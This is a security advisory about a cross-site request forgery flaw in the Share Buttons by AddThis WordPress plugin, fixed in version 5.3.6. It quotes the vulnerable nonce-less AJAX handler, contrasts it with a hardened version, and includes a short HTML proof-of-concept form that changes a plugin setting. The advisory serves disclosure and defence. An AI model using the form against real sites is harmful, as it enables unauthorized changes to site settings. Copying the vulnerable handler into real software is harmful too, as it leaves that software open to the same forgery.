19 Jul 2017

Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Share Buttons by AddThis

We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When the plugin's settings are saved by clicking the Save Options button on its settings page, proper protection against CSRF exists, but it does not for an alternate method that is used when the plugin is set to be controlled from "AddThis.com".

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from someone with the "manage_options" capability (which normally only Administrators have), but doesn't check for a valid nonce to prevent CSRF before updating the plugin's settings:

public function addthisAsyncLoading()
{
	// Capability check only: there is no check_ajax_referer() or wp_verify_nonce()
	// call, so a request forged from another site is accepted as long as the
	// browser sends an Administrator's session cookies.
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);
	}
}

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.
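As an added illustration (not the plugin's code, and not the fix the developer shipped, which removed the handler), the following shows a minimal WordPress AJAX settings handler with the same shape as addthisAsyncLoading, first with only the capability check and then with a nonce check added via check_ajax_referer(); the example_* action, option and function names are assumed for the example.

```php
<?php
// Added example: a minimal AJAX settings handler shaped like addthisAsyncLoading().
// All example_* names are assumed for this illustration, not the plugin's own.

// Vulnerable pattern: capability check only. current_user_can() passes for any
// request carrying an Administrator's cookies, including one a browser submits
// from a third-party page, so the settings can be changed cross-site.
function example_async_loading_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $settings = isset( $_POST['addthis_settings'] ) ? (array) $_POST['addthis_settings'] : array();
    update_option( 'example_addthis_settings', array_map( 'sanitize_text_field', $settings ) );
    wp_send_json_success();
}

// Hardened pattern: the same capability check plus a nonce bound to this action.
// check_ajax_referer() reads the nonce from $_REQUEST['_ajax_nonce'] (or
// '_wpnonce') and ends the request with a 403 when it is missing or invalid.
// A form on another site cannot obtain a valid nonce, so a forged request never
// reaches update_option().
function example_async_loading_hardened() {
    check_ajax_referer( 'example_async_loading' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $settings = isset( $_POST['addthis_settings'] ) ? (array) $_POST['addthis_settings'] : array();
    update_option( 'example_addthis_settings', array_map( 'sanitize_text_field', $settings ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_async_loading', 'example_async_loading_hardened' );

// The plugin's own settings page must hand the matching nonce to the browser so
// that legitimate requests can include it, e.g. as a hidden field on the form
// (or via wp_localize_script() for a JavaScript caller).
function example_settings_form_nonce_field() {
    wp_nonce_field( 'example_async_loading', '_ajax_nonce' );
}
```

The nonce is tied to the logged-in user and to the action name, which is why the PoC form below, which cannot include one, would be rejected by the hardened handler.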

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 26, 2017 – Developer notified.
  • June 26, 2017 – Developer responds.
  • July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
